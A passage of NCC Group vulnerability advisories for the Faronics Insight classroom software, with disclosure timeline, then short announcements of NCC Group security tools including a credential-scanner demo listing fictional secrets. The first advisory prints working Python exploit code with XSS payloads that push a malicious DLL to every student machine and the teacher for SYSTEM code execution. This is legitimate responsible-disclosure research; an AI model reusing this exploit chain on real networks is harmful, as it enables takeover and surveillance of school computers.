Due to the rich and highly privileged functionality offered by the Teacher Console, the ability to silently exploit XSS on the Teacher Machine enables remote code execution on any connected student machine (and the teacher’s machine).

Details

NCC Group researchers observed that, in the default installation configuration, the Teacher Console application contains no authentication or authorization logic when allowing Student Consoles to connect. Because of this, it is possible for an attacker to create their own “Student Console” like application which is purpose-built to exploit flaws in the Teacher Console and connected Student Consoles.

As noted in the Technical Advisory named “RCE as SYSTEM via Artificial Teacher Console”, after going through the UDP handshake process, Student Consoles automatically open a WebSocket connection with the Teacher Console and begin receiving instructions.

NCC Group researchers also observed that when a malicious (artificial) Student Console is created, it is possible to exploit a Cross Site Scripting vulnerability in the “loggedInUser” field of the initial “updateSTAgentStatus” call. The Teacher Console simply renders whatever “loggedInUser” field is provided straight into the DOM and any JavaScript in that field is immediately executed without any user interaction.

As such, a small proof of concept exploit was developed which performs the following steps –

• Abuses the UDP broadcast API to get all active student IDs
• Abuses the UDP broadcast API to get the teacher’s IP and ID
• Uploads a malicious DLL file to the teacher’s machine using the “/api/uploadFiles” endpoint
• Creates a WebSocket connection to the Teacher Console
• For every active student, it submits a malicious “updateSTAgentStatus” HTTP request to the teacher which contains the following XSS payload –

# Start compromising all students.
for student in studentIDs:
    # Inspiration for this exploit from teacher.js line 12213
    # Send the DLL to the students
    json={
        "macAddresses":"00:00:00:00:00:00",
        "ipAddresses":"999.999.999.999",
        "loggedInUser":"<script>sendActionOnSocket({type: 1,handlerFuncName : \"updateAgent\",data: {fileName:\"../../../../Program Files/Faronics/Insight Student/sas.dll\", downloadFilePath:\"/installers/sas.dll\"}, targets: [\""+student+"\"]});</script>",
        "os":"windows",
        "hostName":"DESKTOP-irrelevant",
        "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
        "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
        "monitorCount":1,
        "screenSharingAllowed":True,
        "isUserLoggedIn":True,
        "canChangePreferredName":True,
        "hasMic":True,
        "version":"11.21.2100.262",
        "agentId":desiredMachineID.decode("ascii"),
        "classId":"Class101","preferredName":""
    }

    requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)

Observe that within the “loggedInUser” field is a JavaScript payload which compels a Student Console to execute the “updateAgent” command by retrieving the malicious “sas.dll” file and deploying it to the Faronics Insight installation directory. The proof of concept then abuses the XSS vulnerability again to force all connected Student Consoles to restart using the “restartInsightAgent” command –

time.sleep(3)

    # Instruct the students to restart insight, causing the DLL to be loaded and execute, creating a new user (OLIVER_BROOKS_NCC2:FaNcYfEaSt%2)
    json={
        "macAddresses":"00:00:00:00:00:00",
        "ipAddresses":"999.999.999.999",
        "loggedInUser":"<script>sendActionOnSocket({type: 1,handlerFuncName : \"restartInsightAgent\",targets: [\""+student+"\"]});</script>",
        "os":"windows",
        "hostName":"DESKTOP-irrelevant",
        "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
        "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
        "monitorCount":1,
        "screenSharingAllowed":True,
        "isUserLoggedIn":True,
        "canChangePreferredName":True,
        "hasMic":True,
        "version":"11.21.2100.262",
        "agentId":desiredMachineID.decode("ascii"),
        "classId":"Class101","preferredName":""
    }

    requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)

At this point, code execution as SYSTEM has been achieved on every connected student’s machine.

Finally, the script uploads the same malicious DLL file to the teacher’s Faronics Insight installation directory and compels the Teacher Console to restart by abusing the XSS vulnerability –

# All students are compromised at this point, now we get RCE on the teacher too using the same trick
# Step 4: Send the DLL again and put it in the Insight Teacher directory to get RCE on the teacher
sharedCode.sendFileToTeacher(teacherIP, desiredMachineID.decode("ascii"), localPath, "C:\\Program Files\\Faronics\\Insight Teacher\\", True)

# Quick sleep to make sure everything's planted correctly.
time.sleep(3)

# Step 5: Use XSS to trigger a restart on the teacher machine using the relaunchInsight(); Javascript function
json={
    "macAddresses":"00:00:00:00:00:00",
    "ipAddresses":"999.999.999.999",
    "loggedInUser":"<script>relaunchInsight();</script>",
    "os":"windows",
    "hostName":"DESKTOP-irrelevant",
    "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
    "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
    "monitorCount":1,
    "screenSharingAllowed":True,
    "isUserLoggedIn":True,
    "canChangePreferredName":True,
    "hasMic":True,
    "version":"11.21.2100.262",
    "agentId":desiredMachineID.decode("ascii"),
    "classId":"Class101","preferredName":""
}

requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)

# Step 6: cleanup and be stealthy
# Not yet implemented

sio.disconnect()

At this point, RCE has been achieved on the teacher’s machine and every connected student’s machine by abusing a zero-click XSS vulnerability.

It should be noted, however, that the artificial Student Console could be amended to abuse the XSS vulnerability in any number of ways, including scraping all active Student Console’s file systems and overwriting critical system files to achieve a persistent Denial of Service.

Recommendation

As noted in the other provided Technical Advisories in this bundle, NCC Group strongly recommends that the Teacher Console is updated to require authentication from any Student Console, including requiring a valid session cookie or JWT with every HTTP request from a Student Console.

Requiring authentication with every request will help to mitigate this vulnerability, because it will remove an attacker’s ability to create and operate artificial Student Consoles.

5. RCE as SYSTEM via Artificial Teacher Console (CVE-2023-28349)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Summary

It is possible for an attacker to create an exploit which functions similarly to the Teacher Console, which compels Student Consoles to connect and exploit themselves automatically.

Impact

Remote attackers are able to gain covert remote code execution and surveillance capabilities on student machines by masquerading as a valid Teacher Console.

Details

As part of this vulnerability research, researchers spent some time analysing how Student Consoles and Teacher Consoles connect to one another in the default configuration. The following steps were observed before any connection is made.

1. The Student Console Windows service (FIStudentSvc.exe) starts, which starts the Student Agent (FIStudentAgent.exe) as SYSTEM
2. The Teacher Console Windows service (FITeacherSvc.exe) is started, which starts the Teacher Server (FITeacherServer.exe) as SYSTEM
3. The Teacher Server begins making periodic “DISCO” (discovery) UDP broadcasts to 255.255.255.255 on port 8889 indicating that the teacher console is available
4. All active Student Agent applications respond directly to those broadcasts with a UDP RESP (response) packet. The RESP packet contains their “agent ID”, a unique UUID-like identifier for that Student.
5. The Teacher then sends a UDP START packet to the student, which compels them to automatically perform the following four steps –
   • Make a HTTP request to the Teacher Console at “/api/getClassSettings” to obtain some basic settings about the class
   • Make a HTTP request to “/api/updateSTAgentStatus” to provide the Teacher with some basic details about the Student Console
   • Make a HTTP request to the Teacher at the “/socket.io/” endpoint to start a Websocket session where the Teacher Console Command and Control is performed
   • Make repeated HTTP requests to the API endpoints at “/api/uploadscreenshots” and “/api/appKeystrokeLogs” which provide the Teacher Console with an image of the student’s desktop and a running record of every key that the student types.

At no point during the above sequence of operations is any kind of cryptographic handshake performed to ensure the validity of a Teacher Console, the Student Console is simply compelled to connect and begin divulging keylogger data and screenshots simply by virtue of being provided the UDP “START” packet.

Once the WebSocket connection is setup, a Teacher Console can begin sending commands to the student desktop like “downloadFile”, “launchApp” and “restartInsight”. Having the ability to compel a Student Console to execute these commands paves the way for arbitrary file write and RCE as SYSTEM.

NCC Group researchers created a proof of concept which sends the DISCO UDP broadcast, sends a START packet to any student which responds and then spins up a websocket / HTTP server to handle all requests from the connecting Student Console. The proof of concept then deploys “sas.dll” to the Faronics Student installation directory, commands the application to restart with the “restartInsight” WebSocket command and achieves RCE as SYSTEM using the DLL hijacking vulnerability described in the DLL Hijacking technical advisory.

Recommendation

NCC Group strongly recommends that the initial UDP broadcast challenge/response system is amended to include some form of cryptographic handshake, using a either a pre-shared key which is set at application install time for both the Teacher Console and Student Consoles or alternatively both Student and Teacher consoles could reach out to a Faronics cloud API to obtain a keypair which could be used for authentication. If the Student Console was able to verify that they are connecting to a legitimate Teacher Console by decrypting a “challenge” in the DISCO packet and sending an encrypted “response” in the RESP packet then this vulnerability would be immediately mitigated.

6. All Data Transmitted in Plaintext Enabling MITM (CVE-2023-28348)

Risk: High (7.1 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)

Summary

Data transmitted between Student Consoles and Teacher Consoles is sent over plaintext HTTP and plaintext WebSockets.

Impact

A suitably positioned attacker could perform a person-in-the-middle attack on either a connected student or teacher and intercept student keystrokes or modify executable files being sent from teachers to students.

Details

The Faronics Insight application allows teachers (running the Teacher Console) to administer student devices (running the Student Console). The Teacher Console compels Student Consoles to perform various activities by sending commands over WebSockets, the Student Console responds to these commands either directly over the WebSocket or using the HTTP API exposed by the Teacher Console on port 8890.

Because neither the webserver nor the WebSocket server utilize TLS, it is possible for an attacker to perform a classic ‘person-in-the-middle’ attack to intercept, monitor and manipulate communications between teachers and students.

Recommendation

NCC Group recommends that Faronics ensures that all API traffic and WebSocket traffic is sent over HTTPS and TLS enabled WebSockets. Socket.IO (the WebSocket library used by this application suite) supports TLS out of the box according to the documentation.

7. Enhanced Security Mode May Be Bypassed (CVE-2023-28352)

Risk: High (8.8 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

Each of the vulnerabilities identified within this bundle of Technical Advisories all execute successfully even when Enhanced Security Mode is enabled.

Impact

An attacker controlled artificial Student Console can connect to and attack a Teacher Console even after Enhanced Security Mode has been enabled.

Details

The Faronics Insight Teacher and Student Consoles expose a function at either install time or at runtime called “Enhanced Security”. This functionality is intended to prevent arbitrary Student Consoles from being able to connect to a class, as well as to prevent arbitrary Teacher Consoles from presenting themselves and compelling Student Consoles to join them.

The Enhanced Security functionality forms an effective security measure against unmodified and legitimate Consoles. If a Student Console and Teacher Console do not have the same Enhanced Security key, a student will not be able to join a teacher, and a teacher will not be able to compel a student to join.

It can be seen here within Wireshark that when Enhanced Security mode is enabled on both Consoles, two Consoles will be unable to discover each other with UDP broadcasts if they have differing keys –

It appears that this functionality works by setting an encoded or encrypted section in the UDP broadcasts, which the other party is able/unable to decrypt if their keys match/don’t match respectively.

As part of this vulnerability research, NCC Group researchers observed that if UDP DISCO / RESP / START broadcast packets were simply transmitted without the encoded payload by an artificial Teacher or Student Console then both students and teachers would respond to them, allowing the malicious Console to complete the handshake successfully and either compel Student Consoles to connect or to successfully connect to a Teacher Console as appropriate.

Because of this, each of the supplied Technical Advisories are valid and each of the developed proof-of-concept scripts execute successfully even when Enhanced Security mode is enabled.

Recommendation

NCC Group recommends that the Enhanced Security mechanisms are updated in both the Teacher and Student Consoles such that if a UDP broadcast is received which doesn’t contain the encoded portion then it is simply ignored. This will act as an effective mitigation against malicious Teacher Consoles compelling Student Consoles to connect.

NCC Group also recommends that the Teacher Console is updated to validate that connections are being made from a Student Console which also has both Enhanced Security enabled, and has the correct Enhanced Security key set. This could be validated as part of a HTTP header containing an encrypted and encoded payload, for example.

8. Virtual Host Routing Can Be Defeated (CVE-2023-28346)

Risk: Low (2.8 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N)

Summary

It is possible for a remote attacker to communicate with the private API endpoints exposed on “/login”, “/consoleSettings”, “/console” etc. despite Virtual Host Routing being used to block this access.

Impact

Remote attackers can interact with private pages on the webserver, enabling them to perform privileged actions such as logging into the console and changing console settings if they have valid credentials.

Details

The Faronics Insight Teacher Console exposes a HTTP server on port 8890. The server offers a set of public API endpoints under “/api/*’ which don’t require any authentication. These endpoints are used by Student Consoles to transmit data back and forth from the Teacher Console.

The webserver on port 8890 also exposes another set of endpoints such as “/login”, “/consoleSettings”, “/console” which are only accessible if the user attempts to access them using, for example, http://127.0.0.1:8890 or http://localhost:8890. Attempts to communicate with the webserver remotely are blocked with a 404 error.

During this vulnerability research, it was identified that it’s possible to supply a HTTP “Host” header with a value of “localhost:8890” in order to defeat this control and access the console remotely. Defeating the Virtual Host Routing control enables any network connected attacker to begin auditing and attacking the product as if they were situated on localhost.

Recommendation

NCC Group anticipates that Faronics developers are likely using a library such as VHost as Virtual Host Routing middleware for Express. In addition to using such a middleware, NCC Group suggests that each of the private (localhost only) API endpoints implement a check to ensure that the IP address of the HTTP requestor is either “localhost” or “127.0.0.1”.

An alternative solution which requires more extensive architectural changes would be to setup a second webserver which hosts the private API endpoints, configured to only listen for HTTP traffic from localhost.

9. Keystroke Logs Are Stored in Plaintext in a World Readable Directory (CVE-2023-28351)

Risk: Medium (6.5 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Summary

Every keystroke made by any user on a computer with Faronics Insight Student installed is logged to a world readable directory.

Impact

An attacker with physical or local access to a computer with Faronics Insight installed can trivially extract the plaintext keystrokes of any student who has used the machine, potentially enabling them to obtain PII and/or to compromise personal accounts owned by the victim.

Details

The Faronics Insight Student Console application silently logs every keystroke made by a user, these keystroke logs are periodically transmitted as a JSON payload over a HTTP WebSocket to the Teacher Console where they are made available for the teacher to view them.

During this vulnerability research, it was observed that the keystroke logs are stored in “C:\ProgramData\Faronics\Insight\Data\KeyLogs”, a world readable folder where every individual plaintext keystroke log is readable by any user on the Student Console machine.

It’s unclear how long these log files remain present in this directory before they are purged, but their presence on the machine constitutes a threat to the privacy of the user’s whose keys are being logged by Faronics Insight.

Recommendation

NCC Group recommends that all keystroke logging activity is performed in memory as opposed to storing files on disk, so that after keystrokes are transmitted to the Teacher Console there is no trace of the keystroke logs remaining on disk. Alternatively, if the logs must be kept on disk for a short amount of time, then the “C:\ProgramData\Faronics\Insight\Data\KeyLogs” directory must have its permissions restricted such that only an administrator or SYSTEM can access them, additionally the files should be encrypted at rest in order to help to protect the student’s privacy.

10. Lack of Access Controls on Student APIs (CVE-2023-28344)

Risk: Medium (6.5 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Summary

The Insight Teacher Console application allows unauthenticated attackers to view constantly updated screenshots of student desktops and to submit falsified screenshots on behalf of students.

Impact

Attackers are able to view screenshots of student desktops without their consent. These screenshots may potentially contain sensitive/personal data. Attackers can also rapidly submit falsified images, hiding the actual contents of student desktops from the Teacher Console.

Details

Student Consoles submit screenshots over HTTP POST to the Teacher Console’s webserver on the API endpoint at “/api/uploadscreenshot/agent_id”, where agent_id is the unique UUID-like string which uniquely identifies a connected student’s Console.

By default, Student Consoles will silently transmit a screenshot of the student’s desktop to the teacher every few seconds. The Teacher Console then retrieves these screenshots via HTTP GET from “/uploads/screenshots/agent_id.jpeg” and renders them in the Console. The API endpoint at “/uploads/screenshots/agent_id.jpeg” requires no authentication or authorization to view the uploaded images, because of this, a network connected attacker is able to obtain the images simply by navigating to the correct URL for a given agent ID.

Exposing these images to anyone on the network may potentially inadvertently leak a student’s Personally Identifiable Information (PII) to anyone who is able to guess or otherwise determine the student’s agent ID.

Additionally, because Student Consoles submit their screenshots reasonably quickly and because the Teacher API has no rate limiting measures in place, it is possible for an attacker to query the API rapidly and repeatedly in order to obtain a low framerate “video” feed of the student’s device.

In addition to a lack of access controls on the screenshot-retrieval API, there is also no access control present on the API endpoint which allows students to submit screenshots to the server (“/api/uploadscreenshot/agent_id”).

Lack of access controls on this API endpoint allows any network connected user to send images to the Teacher Console on behalf of a victim Student Console. When the Teacher Console receives these images it then immediately renders them instead of the targeted student’s actual desktop.

In addition to the above two access control lapses, there is also no access control present on the API endpoint which enables Student Consoles to upload the keystrokes that they’ve logged from users. Lack of access control on this API endpoint enables an attacker to submit arbitrary keystrokes to the API on behalf of a student, allowing them to decrease the quality of the logged keystrokes.

Recommendation

NCC Group recommends that the API is updated to only return student device screenshots when HTTP requests originate from localhost, this way the screenshots will not be available to users who attempt to interact with the API remotely.

Additionally, NCC Group recommends that access controls are implemented to prevent arbitrary users from submitting screenshots on behalf of students. Finally, as a general recommendation for the entire application, NCC Group recommends that the Teacher Console is updated to require that a unique session ID be provided with every HTTP request from Student Consoles. A unique session ID, combined with TLS, will help to ensure that requests from student consoles are legitimate.

11. Teacher Console Credentials Exposed via API Endpoint (CVE-2023-28345)

Risk: Medium (4.0 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Summary

The Insight Teacher Console application exposes the teacher’s Console password in plaintext via an API endpoint accessible from localhost.

Impact

Attackers with physical access to the Teacher Console can open a web browser, navigate to the affected endpoint and obtain the teacher’s password. This enables them to log into the Teacher Console and begin trivially attacking student machines.

Details

The Faronics Insight Teacher Console exposes a HTTP server on port 8890. One of the API endpoints available only when making requests to the API from localhost is “/consoleSettings”, this API endpoint returns basic configuration details about the Teacher Console –

Included within this response is the teacher’s password in plaintext (along with the license key and console versions). Exposing this data in plaintext via the API enables an attacker with physical access to retrieve the teacher’s credentials and log in to the Teacher Console.

Because the Teacher Console enables teachers to remotely control student machines via a pseudo-VNC, access to the Teacher Console enables an attacker to trivially compromise any connected student machine.

Because of the flaws highlighted in the Technical Advisory named “Virtual Host Routing Can Be Defeated”, any network connected attacker can connect to this API endpoint and obtain these credentials.

Recommendation

NCC Group recommends against exposing credentials and license keys via API endpoints. As such, the “consoleSettings” API endpoint should be reconfigured to return a minimal set of configuration data to remove this attack vector.

If there is an unavoidable requirement to expose the credentials via this API endpoint, NCC Group strongly recommends that the data is first encrypted and then encoded with base64. This will require a small modification to enable API consumers to decrypt that data, but it will slightly minimize the risk of compromise.

Disclosure Timeline

• 02/01/2023 – First contact with vendor to setup a secure channel to share the vulnerabilities
• 02/01/2023 – Technical Advisories submitted to Faronics
• 02/23/2023 – Contact re-established with Faronics to check how the fixes were progressing
• 03/03/2023 – Re-established contact to set a firm disclosure date of April 28th
• 03/14/2023 – CVE numbers assigned and shared with Faronics
• 04/28/2023 – Contact made with Faronics to query the status of the fixes
• 05/01/2023 – Faronics indicated that the disclosure date would be missed, a QA build would be coming soon
• 05/03/2023 – A QA build of Faronics Insight was given to NCC Group to validate the fixes
• 05/04/2023 – The QA build was confirmed to have mitigated all of the identified vulnerabilities
• 05/17/2023 – Reached out to Faronics once again to enquire about their readiness to release the patch
• 5/17/2023 – Faronics publishes v11.23.x.289 containing fixes (release notes)

Thanks To

I would like to praise the Faronics team on their professionalism, responsiveness and the commitment to the security of their product.

I would also like to thank Jeremy Boone, an NCC Group Technical Director, for his QA efforts and for always patiently answering any silly question which I pose to him.

Finally I’d like to thank my colleague Julian Yates for his QA efforts, and for being an excellent sounding board during this vulnerability research.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Code Query is a new, open source universal code security scanning tool.

CQ scans code for security vulnerabilities and other items of interest to security-focussed code reviewers. It outputs text files containing references to issues found, into an output directory. These output files can then be reviewed, filtered by unix command line tools such as grep, or used as a means to ‘jump’ into the codebase at the specified file:line reference.

One popular mode of use is to consider the output files as a ‘todo’ list, deleting references as they are reviewed and either considered false positives, or copying the references into some report file to either review in detail or provide the basis for a bug report.

The tool is extremely basic, largely manual, and assumes deep knowledge of application security vulnerabilities and code review. It does, however, have the advantages of being relatively fast and reliable, and working even when only partial code is available.

CQ is intended to be used in a security code review context by human experts. It is not intended for use in automated scenarios, although it might be applied in that context.

The CQ project is located at: https://github.com/nccgroup/cq

A common challenge technical teams (e.g. penetration testers) face is centralized deployment and pipelining execution of security tools. It is possible that at some point you have thought about customising several tools, buying their commercial licenses, and allowing a number of people to run the tools from AWS.

The problem is that this means you also have to deal with a bunch of tedious tasks like giving your team access to the EC2 instances, managing the IAM users, updating the OS to protect against privilege escalation, protecting tool licenses, powering the EC2 instances on and off as required.

Let’s imagine that we want to define a pipeline that we want to execute it continuously (e.g. a CI/CD pipeline). When given a range of IP addresses, it scans the UDP ports with Nmap, launches Nessus PRO to analyse the available ports for vulnerabilities and also runs ScoutSuite to evaluate an AWS account. Let’s further imagine that we want all this traffic to originate from a specific pool of AWS IP addresses, that the pipeline tools should be executed in a distributed manner and, while we’re at it, offer the user a web interface so as to abstract them from all the infrastructure that runs underneath.

CowCloud is a serverless solution to distribute workloads in AWS that can execute these pipelines. To get started, spin up an EC2 instance, access it, install Nmap, Nessus and register your Nessus pro license. Then download the ec2py/template.py file from the CowCloud repository and customise it to run both tools against one target and saves the output in the temporal folder `tmp_folder`.

Once you confirm that the template.py works, create a snapshot of the EC2 instance and save the AMI ID of the snapshot.

Next, clone the repository locally, open the Terraform/variables.tf file, and update the AMI variable with your AMI ID, and then simply follow the rest of the installation steps in the repository’s Readme.md.

At the end of the CowCloud deployment, access the URL shown in the Terraform output, log into the website, and queue a new task. Subsequently, the tasks will be consumed by the ec2py tool, which runs on an EC2 instance using your AMI as the base image. And the output/result/reports will be compressed, encrypted and uploaded to an S3 bucket so that the user can download the result of the Nmap and Nessus scans.

That’s all there is to it!

This solution is ideal for cases where you want to maintain an AMI with up-to-date commercial and open source tools and custom configurations for your pentests. With CowCloud, you can abstract users from the hurdles of maintaining and managing the infrastructure so that they only have to worry about the target. All they have to do is send a small amount of required information to the tools that run on the EC2 instances.

CowCloud can be used for a whole range of purposes – you may already have thought of some use cases yourself – but some of the more common ones are detailed below:

• Baselining security testing. Use CowCloud to launch a series of tools that you consider as a baseline every time you do an external pentest (or participate in a bug bounty) and from a pool of EIPs from which the client expects to receive attacks

• Centralized Tool Access and Management. Add API keys and commercial licenses to your AMI so you can provide your teams with the best and most relevant capability, while responsibly managing your licenses.

• Distributed password cracking in AWS. Update the `instance_type` in the variables.tf file with one suitable for cracking passwords

Check out the CowCloud tool here: https://github.com/nccgroup/cowcloud

Code Credential Scanner is a new open source tool designed to detect hardcoded credentials, or credentials present in configuration files within a repository. These represent a serious security issue, and can be extremely hard to detect and manage.

The tool is intended to be used directly by dev teams in a CI/CD pipeline, to manage the remediation process for this issue by alerting the team when credentials are present in the code, so that the team can immediately fix issues as they arise; an example github action is provided to illustrate how this can be configured. Since the tool runs on a local filesystem, it can also be run ad-hoc to detect credentials in local files.

The script is written in python and requires no external dependencies. When run without parameters, it attempts to return only the most serious results, and reduce the number of false-positives (at the inevitable cost of false-negatives). Alternatively, it can be run in a more verbose mode to return usernames, email addresses and similar, in addition to passwords and keys.

CCS is available for download from https://github.com/nccgroup/ccs

The text below is a quick example of ccs running in its default mode on the deliberately-vulnerable repository, “leaky-repo”, at https://github.com/Plazmaz/leaky-repo. All credentials are fictional and provided for demonstration purposes.

[email protected] demo % ~/dev/ccs/ccs.py 
/private/tmp/demo/leaky-repo/.ftpconfig:6:PASSWORD:Rule:49:"pass": ":hunter22:",
/private/tmp/demo/leaky-repo/.ftpconfig:12:PASSWORD:Rule:50:"passphrase": ":swordfish:",
/private/tmp/demo/leaky-repo/.netrc:1:PASSWORD:Rule:51:machine imap.gmail.com login [email protected] password :pass123:
/private/tmp/demo/leaky-repo/.bashrc:105:PASSWORD:Rule:17:export GMAIL_PASSWORD=":Pass!12345:"
/private/tmp/demo/leaky-repo/.bashrc:106:PASSWORD:Rule:27:export MAILCHIMP_API_KEY=":38c47f19e349153fa963bb3b3212fe8e-us11:"
/private/tmp/demo/leaky-repo/.bashrc:109:PASSWORD:Rule:45:JEKYLL_GITHUB_TOKEN=":c77e01c1e89682e4d4b94a059a7fd2b37ab326ed:"
/private/tmp/demo/leaky-repo/sftp-config.json:15:PASSWORD:Rule:19:    "password": ":hunter22:",
/private/tmp/demo/leaky-repo/deployment-config.json:5:PASSWORD:Rule:19:    "password": ":hunter22:",
/private/tmp/demo/leaky-repo/.npmrc:7:PASSWORD:Rule:52:_auth = :YWRtaW46YWRtaW4=:
/private/tmp/demo/leaky-repo/.remote-sync.json:17:PASSWORD:Rule:19:    "password": ":hunter22:"
/private/tmp/demo/leaky-repo/.bash_profile:12:PASSWORD:Rule:28:export AWS_SECRET_ACCESS_KEY=:nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX:
/private/tmp/demo/leaky-repo/.bash_profile:22:PASSWORD:Rule:45:HOMEBREW_GITHUB_API_TOKEN=':51e61afee2c2667123fc9ed160a0a20b330c8f74:'
/private/tmp/demo/leaky-repo/.bash_profile:23:PASSWORD:Rule:2:export SLACK_API_TOKEN=':xoxp-858723095049-581481478633-908968721956-f16b85d1f73ef37c02323bf3fd537ea5:'
/private/tmp/demo/leaky-repo/proftpdpasswd:1:PASSWORD:Rule:67:root::$6$LnUhhUi45srUKt9i$4Hp6VRTOB2mxvsYH8mwsCfBryg6hCbm4JJjV26KplN8ewZ7EUVqQDkLKDW.O8XRHx.B76JkwXtyD3wnAXEuZN1:3044:3045::/home/root:/bin/ftpsh:
/private/tmp/demo/leaky-repo/.docker/.dockercfg:4:PASSWORD:Rule:47:"auth": ":X3Rva2VuOjEyMzQuMThqZjg0MWZrbDQwYU90dTNrLXdCbDVuaThDM2Q0QVh0QjM2V2VqZzM4MDA2WlR5TDhUOWg5VXgrWWwzdTNVQ1hDWFZlWg:"
/private/tmp/demo/leaky-repo/.docker/.dockercfg:8:PASSWORD:Rule:47:"auth": ":X3Rva2VuOjEyMzQuMThqZjg0MWZrbDQwYU90dTNrLXdCbDVuaThDM2Q0QVh0QjM2V2VqZzM4MDA2WlR5TDhUOWg5VXgrWWwzdTNVQ1hDWFZlWg:"
/private/tmp/demo/leaky-repo/.docker/config.json:5:PASSWORD:Rule:47:"auth": ":X3Rva2VuOjEyMzQuMThqZjg0MWZrbDQwYU90dTNrLXdCbDVuaThDM2Q0QVh0QjM2V2VqZzM4MDA2WlR5TDhUOWg5VXgrWWwzdTNVQ1hDWFZlWg:"
/private/tmp/demo/leaky-repo/.docker/config.json:9:PASSWORD:Rule:47:"auth": ":X3Rva2VuOjEyMzQuMThqZjg0MWZrbDQwYU90dTNrLXdCbDVuaThDM2Q0QVh0QjM2V2VqZzM4MDA2WlR5TDhUOWg5VXgrWWwzdTNVQ1hDWFZlWg:"
/private/tmp/demo/leaky-repo/.mozilla/firefox/logins.json:12:PASSWORD:Rule:62:"encryptedPassword": ":MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECBQ0N0EftdcPBBD9CaBvRSe9MhhqBjbd3UG8:",
/private/tmp/demo/leaky-repo/.mozilla/firefox/logins.json:28:PASSWORD:Rule:62:"encryptedPassword": ":MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECBUufYeWbuziBBAraNDREdVus+piXPZaR/Ym:",
/private/tmp/demo/leaky-repo/.mozilla/firefox/logins.json:44:PASSWORD:Rule:62:"encryptedPassword": ":MFIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNa3fxQUbhzwBCjyWS8Qx2UiUcoq3nvLmPXWtc4bdm88HLfIMTGJcM7WvDALDHdWIAwY:",
/private/tmp/demo/leaky-repo/.mozilla/firefox/logins.json:60:PASSWORD:Rule:62:"encryptedPassword": ":MFoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCSrh9ud0IorBDA4ncCjHIDjDlUIliEvJ7at4r2M68qLKFHTGEsiUkRJjRJ0ir6Zy59rKq4EtVnrzMI=:",
/private/tmp/demo/leaky-repo/web/var/www/.env:5:PASSWORD:Rule:56:APP_KEY=:base64:4StV8PVvCLC6gkJXgGdkYdlWW0suqjb2sj0QvDHx3Hsn:
/private/tmp/demo/leaky-repo/web/var/www/.env:14:PASSWORD:Rule:57:DB_PASSWORD=:admin123:
/private/tmp/demo/leaky-repo/web/var/www/.env:23:PASSWORD:Rule:57:REDIS_PASSWORD=:RedisPass1!:
/private/tmp/demo/leaky-repo/web/var/www/.env:33:PASSWORD:Rule:57:MAIL_PASSWORD=:Mailpass1234!:
/private/tmp/demo/leaky-repo/web/var/www/public_html/wp-config.php:20:PASSWORD:Rule:60:DB_PASSWORD', ':admin:' );
/private/tmp/demo/leaky-repo/web/var/www/public_html/wp-config.php:33:PASSWORD:Rule:61:AUTH_KEY',         ':MW1pxMctoyA(>M%0Vl: 2(#o0|2$cB+K|.G$hB~4`Juw@]:(5;oVUl<<W3^e_R-fg');
/private/tmp/demo/leaky-repo/web/var/www/public_html/wp-config.php:35:PASSWORD:Rule:61:SECURE_AUTH_KEY',  ':Y>Y9.5Ch0-3cq|=vbus[IeF(OJ9yZ|SQ#:iG;NSa+GJmj: _1Ed(cVZ7r#+JMlA,S');
/private/tmp/demo/leaky-repo/web/var/www/public_html/wp-config.php:37:PASSWORD:Rule:61:LOGGED_IN_KEY',    ':Q$:B]zZjN-AdT<>h7V1.vm+k^|}2wVZf]Xw#QEZ[-pSohv+Kj0W-Z|:|g$-+E8:8:');
/private/tmp/demo/leaky-repo/web/var/www/public_html/.htpasswd:1:PASSWORD:Rule:58:admin::$apr1$tp8glkbm$fjg65tI1eipoBh62aEjIy0:
/private/tmp/demo/leaky-repo/web/var/www/public_html/config.php:11:PASSWORD:Rule:59:$dbpasswd = ':pass123:';	
/private/tmp/demo/leaky-repo/web/ruby/secrets.yml:14:PASSWORD:Rule:55:secret_key_base: :e0ec946fcefea5ce0d4d924f3c8db11dffeb7d10b320a69133c47a9641ab7d204d22c94f10c1ce1e187c643805fec5b2d2ba322c17bac533c110e6c6378ba84c:
/private/tmp/demo/leaky-repo/web/ruby/secrets.yml:17:PASSWORD:Rule:55:secret_key_base: :96dc2e349b1236b9e5915f1526b5e28e19a6557a88026007632c6c11da7cb5952ae55c520eb0d6fa78b972cbe8e855887f539edea5f969636792e54469e3c96e:
